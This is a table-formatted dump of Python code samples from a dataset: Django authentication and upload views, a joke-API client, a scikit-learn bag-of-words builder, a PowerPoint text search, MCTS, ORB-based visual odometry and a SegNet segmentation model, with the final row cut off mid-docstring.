index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
991,400 | 9770b437af921f6d213793f94d6a2628f08e8359 | #coding=utf8
from django.shortcuts import render,render_to_response
from django import forms
from django.conf import settings
from django.shortcuts import redirect
from django.http import HttpResponse,HttpResponseRedirect
from django.template import RequestContext
from django.contrib.auth import authenticate,login
from django.contrib.auth import logout
from django.contrib.auth.decorators import login_required
from .models import User,Passage
from django.http import JsonResponse
# Create your views here.
def login_view(request):
    """Login page: validate posted credentials and open a session.

    GET renders the empty login page; POST authenticates and redirects
    to /home.html/ on success, or re-renders with an error message.
    """
    if request.method == "POST":
        uf = UserFormLogin(request.POST)
        if uf.is_valid():
            # Read the raw form fields.
            username = request.POST['username']
            password = request.POST['password']
            user = authenticate(username=username,password=password)
            if user is not None:  # credentials match an account
                if user.is_active:  # the account has not been deactivated
                    # NOTE(review): a single module-level global holds the
                    # "current" username for the whole process, so with more
                    # than one logged-in user the other views see whoever
                    # logged in last. Prefer request.user — confirm and fix.
                    global USERNAME
                    USERNAME = username
                    login(request,user)
                    return HttpResponseRedirect("/home.html/")
                else:
                    error="该用户已经注销"
                    return render(request, "userlogin.html",{'error': error})
            else:
                error = "用户名或密码错误"
                return render(request, "userlogin.html", {'error': error})
    else:
        uf = UserFormLogin()
    return render(request,"userlogin.html")
def register(request):
    """Registration page: create a new account from the posted form.

    On success the user is redirected to the login page; on any failure
    (taken username, mismatched passwords, invalid form) the registration
    page is re-rendered, with an error message where applicable.
    """
    if request.method == "POST":
        uf = UserForm(request.POST)
        if uf.is_valid():
            username = uf.cleaned_data['username']
            # .exists() issues an efficient EXISTS query instead of
            # materialising all matching rows just to take len().
            if User.objects.filter(username=username).exists():
                return render(request, 'Register.html', {"errors": "用户名已存在"})
            password1 = uf.cleaned_data['password1']
            password2 = uf.cleaned_data['password2']
            if password1 != password2:
                return render(request, 'Register.html', {'errors': "两次输入的密码不一致!"})
            # create_user() hashes the password and persists the row.
            user = User.objects.create_user(username=username, password=password1)
            user.save()
            return HttpResponseRedirect("/login_view/")
    return render(request, 'Register.html')
@login_required  # unauthenticated users are redirected to the login page
def home(request):
    """Home page: show the eight most recently posted stories."""
    latest_stories = Passage.objects.order_by("-id")[:8]
    return render(request, 'home.html', {'story': latest_stories})
@login_required  # unauthenticated users are redirected to the login page
def upload(request):
    """Upload page: accept a story (title, text, optional image).

    On a valid POST the passage is stored and the user is redirected to
    the home page; otherwise the upload form is (re-)rendered. The
    original returned None on an invalid POST, which made Django raise.
    """
    if request.method == "POST":
        load = UpLoad(request.POST)
        load2 = UpLoad2(request.POST)
        if load.is_valid() or load2.is_valid():
            titlex = request.POST['title']
            passagex = request.POST['passage']
            imgx = request.FILES.get('img')
            # request.user.username identifies THIS session's user; the
            # original module-level USERNAME global held whoever logged in
            # last anywhere in the process.
            up = Passage.objects.create(author=request.user.username,
                                        title=titlex, article=passagex, img=imgx)
            up.save()
            return HttpResponseRedirect("/home.html/")
    return render(request, 'upload.html')
@login_required  # unauthenticated users are redirected to the login page
def user_info(request):
    """Profile page: show the logged-in user's data and apply posted edits.

    POST updates first name, sex, motto and photo, then re-renders the
    page with the saved values; GET just renders the current values.
    """
    # request.user is the authenticated User of THIS session; the original
    # looked it up via a module-level USERNAME global, which is wrong as
    # soon as a second user logs in.
    info = request.user
    if request.method == "POST":
        info.first_name = request.POST['first_name']
        info.sex = request.POST['sex']
        info.motto = request.POST['motto']
        # Matches the original behavior: no uploaded photo clears the field.
        info.photo = request.FILES.get('photo')
        info.save()
    return render(request, "user_info.html", {'info': info})
def logout_view(request):
    """End the current session and send the user back to the login page."""
    logout(request)
    return redirect("/login_view")
class UserForm(forms.Form):
    """Registration form: username plus password and its confirmation."""
    username = forms.CharField(label='用户名',max_length=100)
    password1 = forms.CharField(label='密码',widget=forms.PasswordInput())
    password2 = forms.CharField(label='确认密码',widget=forms.PasswordInput())
class UserFormLogin(forms.Form):
    """Login form: username and password."""
    username = forms.CharField(label='用户名',max_length=100)
    password = forms.CharField(label='密码',widget=forms.PasswordInput())
class UpLoad(forms.Form):
    """Upload form for a story that includes an image."""
    title = forms.CharField(label="标题",max_length=100)
    # Bug fix: forms.Textarea is a *widget*, not a field — assigning the bare
    # widget meant `passage` was silently ignored by form validation.
    passage = forms.CharField(widget=forms.Textarea())
    img = forms.FileField()
class UpLoad2(forms.Form):
    """Upload form for a story without an image."""
    title = forms.CharField(label="标题",max_length=100)
    # Bug fix: forms.Textarea is a *widget*, not a field — assigning the bare
    # widget meant `passage` was silently ignored by form validation.
    passage = forms.CharField(widget=forms.Textarea())
|
991,401 | e7aa8d577042225c13a876d3721d017b9251b748 | import json
import requests
def joke():
    """Fetch and print jokes from JokeAPI until the user declines another.

    Two-part jokes print setup and delivery; single jokes print the joke
    text. Any answer other than "y" at the prompt ends the session.
    """
    # Iterate instead of recursing: the original called joke() for every
    # "y" answer, so a long session could hit the recursion limit.
    while True:
        response = requests.get('https://v2.jokeapi.dev/joke/Programming,Miscellaneous,Dark,Pun,Spooky')
        data = response.json()
        if data["type"] == "twopart":
            print(data["setup"])
            print(data["delivery"])
        elif data["type"] == "single":
            print(data["joke"])
        retry = input("Do you want to hear another joke?(y/n): ")
        if retry == "y":
            continue
        if retry == "n":
            print("Alright then, have a nice day!")
        return


if __name__ == "__main__":
    # Guard the entry point so importing this module does not start
    # prompting the user (the original ran joke() at import time).
    joke()
|
991,402 | f9c7b28f35bfc68c885856ee2470da86589e6687 | """
Question:
Please write a program using generator to print the numbers which can be divisible by 5 and 7 between 0 and n in comma separated form while n is input by console.
Example:
If the following n is given as input to the program:
100
Then, the output of the program should be:
0,35,70
Hints:
Use yield to produce the next value in generator.
In case of input data being supplied to the question, it should be assumed to be a console input.
"""
# Read the upper bound n from the console (raw_input: this is Python 2 code).
n = int(raw_input("Enter a number:"))
def foo(n):
    """Yield every integer in [0, n] divisible by both 5 and 7."""
    # Divisible by 5 AND by 7 <=> divisible by 35; the original also
    # wrapped the loop in a redundant inner generator expression.
    for num in range(n + 1):
        if num % 35 == 0:
            yield num
# Print the generated values comma-separated. A single parenthesised
# argument makes this print valid on both Python 2 and Python 3, and
# joining the generator directly avoids the manual append loop.
print(",".join(str(num) for num in foo(n)))
|
991,403 | 418b348d31fadc2857df0bc4c04d964cdc7a1baf | #!/usr/bin/env python
import logging
import sys
from sklearn.feature_extraction.text import CountVectorizer
from sentiment_analysis.make_dataset import read_dataset
from sentiment_analysis.utils import write_pickle
def make_bag_of_words_features(
        corpus_dataset_path,
        training_dataset_path,
        validation_dataset_path,
        testing_dataset_path,
        training_term_matrix_out_path,
        validation_term_matrix_out_path,
        testing_term_matrix_out_path,
        max_features=5000):
    """Build bag-of-words term-document matrices for the three splits.

    The vocabulary (with English stop words removed) is learned from the
    corpus dataset, then applied to the training, validation and testing
    datasets; each resulting matrix is pickled to its output path.

    Arguments:
        corpus_dataset_path: TSV file whose reviews define the vocabulary.
        training_dataset_path: TSV file with the training dataset.
        validation_dataset_path: TSV file with the validation dataset.
        testing_dataset_path: TSV file with the testing dataset.
        training_term_matrix_out_path: pickle output for the training matrix.
        validation_term_matrix_out_path: pickle output for the validation
            matrix.
        testing_term_matrix_out_path: pickle output for the testing matrix.
        max_features: maximum dimensionality of the feature vectors.
    """
    corpus = read_dataset(corpus_dataset_path)
    # Stop words are excluded while the vocabulary is learned.
    bow_vectorizer = CountVectorizer(analyzer='word', max_features=max_features,
                                     stop_words='english')
    bow_vectorizer.fit(corpus['review'].values)
    training_set = read_dataset(training_dataset_path)
    validation_set = read_dataset(validation_dataset_path)
    testing_set = read_dataset(testing_dataset_path)
    training_matrix = bow_vectorizer.transform(training_set['review'].values)
    validation_matrix = bow_vectorizer.transform(validation_set['review'].values)
    testing_matrix = bow_vectorizer.transform(testing_set['review'].values)
    write_pickle(training_matrix, training_term_matrix_out_path)
    write_pickle(validation_matrix, validation_term_matrix_out_path)
    write_pickle(testing_matrix, testing_term_matrix_out_path)
if __name__ == '__main__':
    # Create term matrices for the training, testing and validation sets,
    # using the unlabeled dataset to learn the vocabulary.
    #
    # Positional command-line arguments, in order:
    #   unlabeled_dataset_path, training_dataset_path,
    #   validation_dataset_path, testing_dataset_path,
    #   training_term_matrix_out_path, validation_term_matrix_out_path,
    #   testing_term_matrix_out_path
    if len(sys.argv) != 8:
        logging.error('Expected 7 arguments: unlabeled_dataset_path, ' +
                      'training_dataset_path, validation_dataset_path, ' +
                      'testing_dataset_path, training_term_matrix_out_path, ' +
                      'validation_term_matrix_out_path, ' +
                      'testing_term_matrix_out_path')
        sys.exit(1)
    arg_names = ('unlabeled_dataset_path', 'training_dataset_path',
                 'validation_dataset_path', 'testing_dataset_path',
                 'training_term_matrix_out_path',
                 'validation_term_matrix_out_path',
                 'testing_term_matrix_out_path')
    arg_values = sys.argv[1:8]
    # Log each argument in declaration order, matching the original output.
    for arg_name, arg_value in zip(arg_names, arg_values):
        logging.info('{}: {}'.format(arg_name, arg_value))
    make_bag_of_words_features(*arg_values)
|
991,404 | cf59ee21080d1e56a2a36f8f382dd9eb82570683 | import nltk
import collections
from nltk import word_tokenize
from nltk.corpus import stopwords
from nltk.stem import PorterStemmer
import numpy as np
from pptx import Presentation
import os
def prcoss(tokens):
    """Return a word -> occurrence-count mapping for *tokens*.

    collections.Counter is the stdlib equivalent of the original manual
    defaultdict(int) tally; being a dict subclass, it keeps callers that
    use .get()/iteration working unchanged.
    """
    return collections.Counter(tokens)
def cos_sim(a, b):
    """Return the cosine similarity of vectors *a* and *b*.

    Returns 0.0 when either vector has zero norm; the original divided by
    zero there and produced nan with a runtime warning.
    """
    norm_a = np.linalg.norm(a)
    norm_b = np.linalg.norm(b)
    if norm_a == 0 or norm_b == 0:
        return 0.0
    return np.dot(a, b) / (norm_a * norm_b)
def getSimilarity(dict1, dict2):
    """Return the cosine similarity between two word-count dicts.

    Each key of either dict becomes a vector coordinate whose value is the
    count in dict1 / dict2 (0 when absent).
    """
    # NOTE(review): keys present in both dicts are appended twice, so shared
    # words get two coordinates; preserved here to keep scores unchanged,
    # but a set union is probably what was intended — confirm.
    all_words_list = []
    for key in dict1:
        all_words_list.append(key)
    for key in dict2:
        all_words_list.append(key)
    all_words_list_size = len(all_words_list)
    # Bug fix: the np.int alias was removed in NumPy 1.24; use builtin int.
    v1 = np.zeros(all_words_list_size, dtype=int)
    v2 = np.zeros(all_words_list_size, dtype=int)
    for i, key in enumerate(all_words_list):
        v1[i] = dict1.get(key, 0)
        v2[i] = dict2.get(key, 0)
    return cos_sim(v1, v2)
def word_tokenizer(text):
    """Tokenize *text*, drop English stop words, and Porter-stem the rest."""
    tokens = word_tokenize(text)
    stemmer = PorterStemmer()
    # Build the stop-word set once: the original re-read the stop-word
    # corpus list on every token, an O(tokens * stopwords) scan.
    stop_set = set(stopwords.words('english'))
    return [stemmer.stem(t) for t in tokens if t not in stop_set]
def getPPTDetails(searchItem, path='/home/peter/Documents/myproject/media'):
    """Search all .pptx files under *path* for sentences similar to *searchItem*.

    Every text run of every slide is split into sentences; a sentence is a
    hit when its cosine similarity with the search phrase exceeds 0.1.

    Arguments:
        searchItem: the phrase to look for.
        path: directory scanned for .pptx files (parameterised; the
            original hard-coded this location).

    Returns:
        A list of [filename, hits] entries, where each hit is
        [sentence, slide_number, sentence_number] (both 1-based).
    """
    directory = [x for x in os.listdir(path) if x.endswith(".pptx")]
    ppt = {}
    for pptx_filename in directory:
        prs = Presentation(path + '/' + pptx_filename)
        # text_runs collects, per slide, the slide's text split into sentences.
        text_runs = []
        for slide in prs.slides:
            sh = ''
            for shape in slide.shapes:
                if not shape.has_text_frame:
                    continue
                for paragraph in shape.text_frame.paragraphs:
                    for run in paragraph.runs:
                        sh = sh + ' ' + run.text
            if sh:
                text_runs.append(sh.split('.'))
        ppt[pptx_filename] = text_runs
    result = []
    for keys in ppt:
        p = []
        for i in range(0, len(ppt[keys])):
            for j in range(0, len(ppt[keys][i])):
                if getSimilarity(prcoss(word_tokenizer(ppt[keys][i][j])), prcoss(word_tokenizer(searchItem))) > 0.1:
                    p.append([ppt[keys][i][j], i + 1, j + 1])
        if len(p):
            result.append([keys, p])
    return result
|
991,405 | 6df514e1662f986aee9e324d5a0479bbdcfaeec4 | from __future__ import print_function
from __future__ import absolute_import
import random
from .utils import rand_max
import copy
from .graph import StateNode
class MCTS(object):
    """
    The central MCTS class, which performs the tree search. It gets a
    tree policy, a default policy, and a backup strategy.
    See e.g. Browne et al. (2012) for a survey on monte carlo tree search
    """
    def __init__(self, tree_policy, default_policy, backup, game):
        self.tree_policy = tree_policy
        self.default_policy = default_policy
        self.backup = backup
        self.game = game
        # Pristine copy used to reset the game between roll-outs.
        self.game_bak = copy.deepcopy(self.game)

    def __call__(self, s, n=1000):
        """
        Run the monte carlo tree search.
        :param s: the initial state the root node is built from
        :param n: The number of roll-outs to be performed
        :return: (best action, its q-value)
        """
        root = StateNode(None, s, self.game)
        if root.parent is not None:
            raise ValueError("Root's parent must be None.")
        for _ in range(n):
            # Selection / expansion.
            node = _get_next_node(root, self.tree_policy)
            # Simulation.
            node.reward = self.default_policy(node)
            # Backpropagation, then restore the game for the next roll-out.
            self.backup(node)
            root.reset(copy.deepcopy(self.game_bak))
        # Bug fix: pick the best child exactly once. rand_max breaks ties
        # randomly, so the original pair of calls could return the action of
        # one node but the q-value of a different, equally-scored node.
        best = rand_max(root.children.values(), key=lambda x: x.q)
        return best.action, best.q
def _expand(state_node):
    """Expand the first untried action of *state_node* and sample its state."""
    # The original drew random.choice(untried_actions) and immediately
    # overwrote it with the first untried action; the dead draw is dropped.
    action = state_node.untried_actions[0]
    return state_node.children[action].sample_state()
def _best_child(state_node, tree_policy):
    """Sample a state from the child action node ranked best by *tree_policy*."""
    chosen = rand_max(state_node.children.values(), key=tree_policy)
    return chosen.sample_state()
def _get_next_node(state_node, tree_policy):
    """Descend the tree, expanding the first node with untried actions.

    Returns either a freshly expanded state or the terminal state reached
    by repeatedly following the tree policy.
    """
    current = state_node
    while not current.is_terminal():
        if current.untried_actions:
            return _expand(current)
        current = _best_child(current, tree_policy)
    return current
|
991,406 | 6cd56359a2d5491b58dd5f061c39b1782a03feb3 | from .entity import Entity
from .weapon import Weapon
from ..tools import sf, gen_texture
class Ship(Entity):
    """An entity that carries a weapon and can fire projectiles."""

    def __init__(self, x=20, y=20):
        # Build the ship's texture at the requested size.
        super().__init__(gen_texture(x, y))
        self.weapon = Weapon()

    def shoot(self, board):
        """Fire the weapon; queue the projectile on *board* if one was produced."""
        projectile = self.weapon.use(self.position, self.velocity, self.rotation, self.ident)
        if projectile is None:
            return
        board.queue(projectile)

    def collide(self, other):
        """On collision, damage the other entity with our velocity."""
        other.damage(self.velocity)
|
991,407 | 6044e0f4ebb3537e5d50988ce854700ea540f104 | import numpy as np
import cv2
import pyrealsense2 as rs
from ORB_VO.pso import PSO
THRESHHOLD = 30
FEATUREMAX = 200
INLIER_DIST_THRE = 10
class Optimizer:
    """Estimates inter-frame motion from matched ORB features using PSO."""
    def __init__(self, featureA, featureB, matches, intrin):
        # Keypoints of the previous (A) and current (B) frame, plus matches.
        self.featureA = featureA
        self.featureB = featureB
        self.matches = matches
        # Deprojected 3-D points for each frame, filled by get_list().
        self.listA = []
        self.listB = []
        # Camera intrinsics used for pixel-to-point deprojection.
        self.intrin = intrin
    def get_list(self):
        """Deproject each matched pixel pair into listA/listB 3-D points.

        NOTE(review): reads the module-level `aligned_depth_frame` created in
        the __main__ loop below — confirm before reusing this class elsewhere.
        """
        for match in self.matches:
            img_pixel = [int(self.featureA[match.queryIdx].pt[0]), int(self.featureA[match.queryIdx].pt[1])]
            depth = aligned_depth_frame.get_distance(img_pixel[0], img_pixel[1])
            point_a = rs.rs2_deproject_pixel_to_point(self.intrin, img_pixel, depth)
            # Keep (x, z) plus a homogeneous 1 — the y component is dropped.
            point_a = [point_a[0], point_a[2], 1]
            img_pixel = [int(self.featureB[match.trainIdx].pt[0]), int(self.featureB[match.trainIdx].pt[1])]
            depth = aligned_depth_frame.get_distance(img_pixel[0], img_pixel[1])
            point_b = rs.rs2_deproject_pixel_to_point(self.intrin, img_pixel, depth)
            point_b = [point_b[0], point_b[2], 1]
            self.listA.append(point_a)
            self.listB.append(point_b)
    def optimize(self):
        """Run particle-swarm optimisation over the deprojected point lists."""
        pso_optimizer = PSO(population_size=50,max_steps=50,pA=self.listA,pB=self.listB)
        self.optimzed_result = pso_optimizer.evolve()
class ORBDetector:
    """Detects, matches and filters ORB features between consecutive frames."""

    def __init__(self, frame):
        # Keypoints / descriptors for the previous (A) and current (B) frame.
        self.featureFrameA = []
        self.featureFrameB = []
        self.featureDesA = []
        self.featureDesB = []
        self.frameA = []
        self.frameB = frame
        self.orb = cv2.ORB_create(nfeatures=FEATUREMAX, fastThreshold=THRESHHOLD)
        self.score = []
        self.bfMatcher = cv2.BFMatcher_create(normType=cv2.NORM_HAMMING, crossCheck=True)
        self.match = []
        # Pairwise-compatibility matrix built by find_inlier().
        self.W = []
        self.best_matches = []

    def detect_features(self):
        """Detect features and calculate the descriptors"""
        # P.S. the features and descriptors of frame A are calculated beforehand
        self.featureFrameB, self.featureDesB = self.orb.detectAndCompute(self.frameB, None)

    def match_features(self):
        """This method match the features using BrutalForce and sort them by similarity
        and only take the strongest 50"""
        # `is not None` replaces the roundabout type(None) comparison.
        if self.featureDesA is not None and self.featureDesB is not None:
            matches = self.bfMatcher.match(self.featureDesA, self.featureDesB)
            self.match = sorted(matches, key=lambda x: x.distance)[:50]
        else:
            self.match = []

    def find_most_compatible_match(self, candidate):
        """Return the candidate index with the highest compatibility count.

        Returns None when `candidate` is empty, and -1 when no candidate has
        a positive compatibility count.
        """
        best_matchIdx = -1
        best_matchVal = 0
        len_of_match = len(self.match)
        # Bug fix: `not candidate.any()` treated the sole remaining
        # candidate index 0 as an empty set; test emptiness explicitly.
        if candidate.size == 0:
            return None
        for i in candidate:
            if self.W[len_of_match][i] > best_matchVal:
                best_matchVal = self.W[len_of_match][i]
                best_matchIdx = i
        return best_matchIdx

    def find_inlier(self):
        """This method execute the A4 step of the journal"""
        len_of_matches = len(self.match)
        # The last line of W stores the whole number of consistency of this match
        self.W = np.zeros((len_of_matches+1, len_of_matches))
        for i in np.arange(len_of_matches):
            for j in np.arange(len_of_matches):
                if i >= j:
                    continue
                # ASSUMPTION : the index of descriptor is the same with the index of image
                wa = self.featureFrameA[self.match[i].queryIdx].pt[0]-self.featureFrameA[self.match[j].queryIdx].pt[0]
                wb = self.featureFrameA[self.match[i].queryIdx].pt[1]-self.featureFrameA[self.match[j].queryIdx].pt[1]
                wa_ = self.featureFrameB[self.match[i].trainIdx].pt[0]-self.featureFrameB[self.match[j].trainIdx].pt[0]
                wb_ = self.featureFrameB[self.match[i].trainIdx].pt[1]-self.featureFrameB[self.match[j].trainIdx].pt[1]
                # Compare and complete the matrix W
                if abs(wa-wa_) + abs(wb-wb_) <= INLIER_DIST_THRE:
                    self.W[i, j] = 1
                    self.W[j, i] = 1
                    self.W[len_of_matches, j] += 1
        # Choose the best inlier features
        self.best_matches = []
        candidate = np.arange(len_of_matches)
        while True:
            best_matchIdx = self.find_most_compatible_match(candidate)
            # Bug fix: `if not best_matchIdx` also rejected the valid index 0,
            # silently dropping the best match; test the sentinels explicitly.
            if best_matchIdx is None or best_matchIdx == -1:
                break
            self.best_matches.append(self.match[best_matchIdx])
            candidate = np.delete(candidate, np.where(candidate == best_matchIdx), axis=0)

    def set_frame(self, frame_next):
        """This method is applied after each frame is processed intending for reduce the calculation cost
        Refer to the jounal : A2 step last paragraph"""
        self.featureDesA = self.featureDesB
        self.featureFrameA = self.featureFrameB
        self.frameA = self.frameB
        self.frameB = frame_next
if __name__ == "__main__":
    # Configure and start the RealSense pipeline with aligned depth + color
    # streams at 640x480 / 30 fps.
    pipe = rs.pipeline()
    config = rs.config()
    config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)
    config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)
    profile = pipe.start(config)
    # Unused line, intending for access to the intrinsic parameter of the camera
    profile = pipe.get_active_profile()
    # Getting the depth sensor's depth scale. Real dist / scale = depth_frame_dist
    depth_sensor = profile.get_device().first_depth_sensor()
    depth_scale = depth_sensor.get_depth_scale()
    # Align object creation
    align_to = rs.stream.color
    align = rs.align(align_to)
    # Skip the first five frame for stable usage.
    for i in np.arange(5):
        frames = pipe.wait_for_frames()
    iterCount = 0
    while True:
        # Wait for a coherent pair of frames: depth and color
        frames = pipe.wait_for_frames()
        # Align the depth frame and color frame
        aligned_frames = align.process(frames)
        # NOTE: aligned_depth_frame is the module-level global that
        # Optimizer.get_list() reads.
        aligned_depth_frame = aligned_frames.get_depth_frame()
        color_frame = aligned_frames.get_color_frame()
        if not aligned_depth_frame or not color_frame:
            continue
        # Intrinsics & Extrinsics
        depth_intrin = aligned_depth_frame.profile.as_video_stream_profile().intrinsics
        color_intrin = color_frame.profile.as_video_stream_profile().intrinsics
        depth_to_color_extrin = aligned_depth_frame.profile.get_extrinsics_to(
            color_frame.profile)
        # Convert images to numpy arrays
        depth_image = np.asanyarray(aligned_depth_frame.get_data())
        color_image = np.asanyarray(color_frame.get_data())
        # Detect the ORB features by Opencv2 using orb method and match them
        # Corresponding to the A2-A3 steps in the journal
        if iterCount == 0:
            orb_detector = ORBDetector(color_image)
            orb_detector.detect_features()
        else:
            # Update a new frame by set_frame()
            orb_detector.set_frame(color_image)
            orb_detector.detect_features()
            orb_detector.match_features()
            if orb_detector.match.__len__() != 0:
                orb_detector.find_inlier()
        # Draw the features on the image for debugging
        # image = cv2.drawKeypoints(color_image, orb_detector.featureFrameB, color_image, color=(255, 0, 0))
        if iterCount != 0:
            image = cv2.drawMatches(orb_detector.frameA, orb_detector.featureFrameA,
                                    orb_detector.frameB, orb_detector.featureFrameB,
                                    orb_detector.best_matches, orb_detector.frameA)
            cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)
            cv2.imshow('RealSense', image)
            cv2.waitKey(10)
        # Optimize to calculate the transition matrix
        optimizer = Optimizer(orb_detector.featureFrameA, orb_detector.featureFrameB, orb_detector.best_matches,
                              depth_intrin)
        if iterCount != 0:
            optimizer.get_list()
            optimizer.optimize()
        # For the test of depth convert
        depth = aligned_depth_frame.get_distance(240, 320)
        result = depth_image[240, 320]
        # Update the iterCount
        # print(orb_detector.best_matches)
        # print(orb_detector.featureFrameA)
        if iterCount <= 1000:
            iterCount += 1
        orb_detector.best_matches = []
|
991,408 | 21bf0e36a823c29119142c5ef199a2b14ec3ca3b | import torch.nn.functional as F
from torch import nn
from torchvision import models
class SegNet(nn.Module):
    """SegNet semantic-segmentation network (VGG16-BN style encoder/decoder).

    The encoder mirrors VGG16-BN's 13 conv+bn layers; max-pool indices are
    kept so the decoder can unpool to the exact pre-pool positions.
    """
    def __init__(self, num_classes, pretrained=False, fix_weights=False):
        # num_classes: number of output segmentation channels.
        # pretrained: copy VGG16-BN weights into the encoder.
        # fix_weights: additionally freeze those copied weights.
        super(SegNet, self).__init__()
        self.name = "true_segnet"
        self.num_classes = num_classes
        # vgg = models.vgg16_bn(pretrained=pretrained)
        # features = list(vgg.features.children())
        # maxpool = nn.MaxPool2d(2, 2, return_indices=True)
        # Encoder
        self.conv11 = nn.Conv2d(3, 64, 3, padding=1)
        self.bn11 = nn.BatchNorm2d(64)
        self.conv12 = nn.Conv2d(64, 64, 3, padding=1)
        self.bn12 = nn.BatchNorm2d(64)
        self.conv21 = nn.Conv2d(64, 128, 3, padding=1)
        self.bn21 = nn.BatchNorm2d(128)
        self.conv22 = nn.Conv2d(128, 128, 3, padding=1)
        self.bn22 = nn.BatchNorm2d(128)
        self.conv31 = nn.Conv2d(128, 256, 3, padding=1)
        self.bn31 = nn.BatchNorm2d(256)
        self.conv32 = nn.Conv2d(256, 256, 3, padding=1)
        self.bn32 = nn.BatchNorm2d(256)
        self.conv33 = nn.Conv2d(256, 256, 3, padding=1)
        self.bn33 = nn.BatchNorm2d(256)
        self.conv41 = nn.Conv2d(256, 512, 3, padding=1)
        self.bn41 = nn.BatchNorm2d(512)
        self.conv42 = nn.Conv2d(512, 512, 3, padding=1)
        self.bn42 = nn.BatchNorm2d(512)
        self.conv43 = nn.Conv2d(512, 512, 3, padding=1)
        self.bn43 = nn.BatchNorm2d(512)
        self.conv51 = nn.Conv2d(512, 512, 3, padding=1)
        self.bn51 = nn.BatchNorm2d(512)
        self.conv52 = nn.Conv2d(512, 512, 3, padding=1)
        self.bn52 = nn.BatchNorm2d(512)
        self.conv53 = nn.Conv2d(512, 512, 3, padding=1)
        self.bn53 = nn.BatchNorm2d(512)
        # Decoder
        self.conv53d = nn.Conv2d(512, 512, 3, padding=1)
        self.bn53d = nn.BatchNorm2d(512)
        self.conv52d = nn.Conv2d(512, 512, 3, padding=1)
        self.bn52d = nn.BatchNorm2d(512)
        self.conv51d = nn.Conv2d(512, 512, 3, padding=1)
        self.bn51d = nn.BatchNorm2d(512)
        self.conv43d = nn.Conv2d(512, 512, 3, padding=1)
        self.bn43d = nn.BatchNorm2d(512)
        self.conv42d = nn.Conv2d(512, 512, 3, padding=1)
        self.bn42d = nn.BatchNorm2d(512)
        self.conv41d = nn.Conv2d(512, 256, 3, padding=1)
        self.bn41d = nn.BatchNorm2d(256)
        self.conv33d = nn.Conv2d(256, 256, 3, padding=1)
        self.bn33d = nn.BatchNorm2d(256)
        self.conv32d = nn.Conv2d(256, 256, 3, padding=1)
        self.bn32d = nn.BatchNorm2d(256)
        self.conv31d = nn.Conv2d(256, 128, 3, padding=1)
        self.bn31d = nn.BatchNorm2d(128)
        self.conv22d = nn.Conv2d(128, 128, 3, padding=1)
        self.bn22d = nn.BatchNorm2d(128)
        self.conv21d = nn.Conv2d(128, 64, 3, padding=1)
        self.bn21d = nn.BatchNorm2d(64)
        self.conv12d = nn.Conv2d(64, 64, 3, padding=1)
        self.bn12d = nn.BatchNorm2d(64)
        self.conv11d = nn.Conv2d(64, num_classes, 3, padding=1)
        if pretrained:
            self.initialize_weights(fix_weights)
    def forward(self, x):
        """Encode with index-tracking max-pools, then decode with unpooling.

        Returns raw per-class logits with the input's spatial size.
        """
        # maxpool = nn.MaxPool2d(2, 2, return_indices=True)
        # maxunpool = nn.MaxUnpool2d(2, 2)
        x = F.relu(self.bn11(self.conv11(x)))
        x = F.relu(self.bn12(self.conv12(x)))
        # sizeN/idN record pre-pool sizes and argmax indices for unpooling.
        size1 = x.size()
        x, id1 = F.max_pool2d(x, 2, 2, return_indices=True)
        x = F.relu(self.bn21(self.conv21(x)))
        x = F.relu(self.bn22(self.conv22(x)))
        size2 = x.size()
        x, id2 = F.max_pool2d(x, 2, 2, return_indices=True)
        x = F.relu(self.bn31(self.conv31(x)))
        x = F.relu(self.bn32(self.conv32(x)))
        x = F.relu(self.bn33(self.conv33(x)))
        size3 = x.size()
        x, id3 = F.max_pool2d(x, 2, 2, return_indices=True)
        x = F.relu(self.bn41(self.conv41(x)))
        x = F.relu(self.bn42(self.conv42(x)))
        x = F.relu(self.bn43(self.conv43(x)))
        size4 = x.size()
        x, id4 = F.max_pool2d(x, 2, 2, return_indices=True)
        x = F.relu(self.bn51(self.conv51(x)))
        x = F.relu(self.bn52(self.conv52(x)))
        x = F.relu(self.bn53(self.conv53(x)))
        size5 = x.size()
        x, id5 = F.max_pool2d(x, 2, 2, return_indices=True)
        # Decoding
        x = F.max_unpool2d(x, id5, 2, 2, output_size=size5)
        x = F.relu(self.bn53d(self.conv53d(x)))
        x = F.relu(self.bn52d(self.conv52d(x)))
        x = F.relu(self.bn51d(self.conv51d(x)))
        x = F.max_unpool2d(x, id4, 2, 2, output_size=size4)
        x = F.relu(self.bn43d(self.conv43d(x)))
        x = F.relu(self.bn42d(self.conv42d(x)))
        x = F.relu(self.bn41d(self.conv41d(x)))
        x = F.max_unpool2d(x, id3, 2, 2, output_size=size3)
        x = F.relu(self.bn33d(self.conv33d(x)))
        x = F.relu(self.bn32d(self.conv32d(x)))
        x = F.relu(self.bn31d(self.conv31d(x)))
        x = F.max_unpool2d(x, id2, 2, 2, output_size=size2)
        x = F.relu(self.bn22d(self.conv22d(x)))
        x = F.relu(self.bn21d(self.conv21d(x)))
        x = F.max_unpool2d(x, id1, 2, 2, output_size=size1)
        x = F.relu(self.bn12d(self.conv12d(x)))
        x = self.conv11d(x)
        return x
    def initialize_weights(self, fix_weights):
        """Copy VGG16-BN conv/bn weights into the encoder layers in order.

        Relies on self._modules preserving declaration order, so the first
        26 conv/bn modules of this network line up with VGG's features.
        If fix_weights is True the copied layers are frozen.
        """
        vgg = models.vgg16_bn(pretrained=True)
        vgg_layers = [c for c in vgg.features.children() if isinstance(c, nn.Conv2d) or isinstance(c, nn.BatchNorm2d)]
        segnet_layers = list(self._modules.values())
        i = 0
        for l in vgg_layers:
            if isinstance(l, nn.Conv2d) or isinstance(l, nn.BatchNorm2d):
                segnet_layers[i].weight = l.weight
                segnet_layers[i].bias = l.bias
                if isinstance(l, nn.BatchNorm2d):
                    segnet_layers[i].running_mean = l.running_mean
                    segnet_layers[i].running_var = l.running_var
                # Fix weights of VGG
                if fix_weights:
                    for param in segnet_layers[i].parameters():
                        param.requires_grad = False
                i += 1
|
991,409 | 331e262af450ca3ddd3df3a68d4af10ad828bffe | # SECTION PROCESS - Processes command line arguments.
# =====================================================
def resolve(args=None, type=''):
    """Return the command or argument from a parsed argument list.

    Args:
        args: list of command-line tokens; None is treated as empty.
            (The original used a mutable default `args=[]` — a shared-state
            pitfall — replaced with the None-sentinel idiom.)
        type: 'command' (index 0) or 'argument' (index 1); any other value
            raises KeyError, matching the original behavior.
